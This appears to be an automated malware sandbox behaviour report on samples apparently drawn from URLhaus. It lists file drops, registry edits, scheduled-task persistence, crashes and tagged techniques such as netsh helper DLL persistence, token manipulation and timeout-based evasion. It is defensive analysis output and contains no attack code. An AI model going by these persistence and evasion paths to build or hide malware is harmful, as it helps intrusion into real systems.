File created C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bn.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_et.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_vi.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fil.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_it.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_es-419.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\psuser_64.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en-GB.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ur.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine_64.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateOnDemand.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_it.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_tr.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_zh-TW.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psuser.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_kn.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_id.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine_64.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ru.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_hu.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ms.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pl.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_mr.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File opened for modification C:\Program Files (x86)\Google\Temp\GUT656E.tmp C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateBroker.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_am.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_mr.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ta.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_tr.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pt-BR.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_uk.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_nl.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_sv.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_el.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdate.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bg.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\palladiums\translucently.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\key.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\http.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\msf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ping.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SysWOW64\ping.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772974190804545" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ = "IBrowserHttpRequest2" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ = "IPolicyStatusValue" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
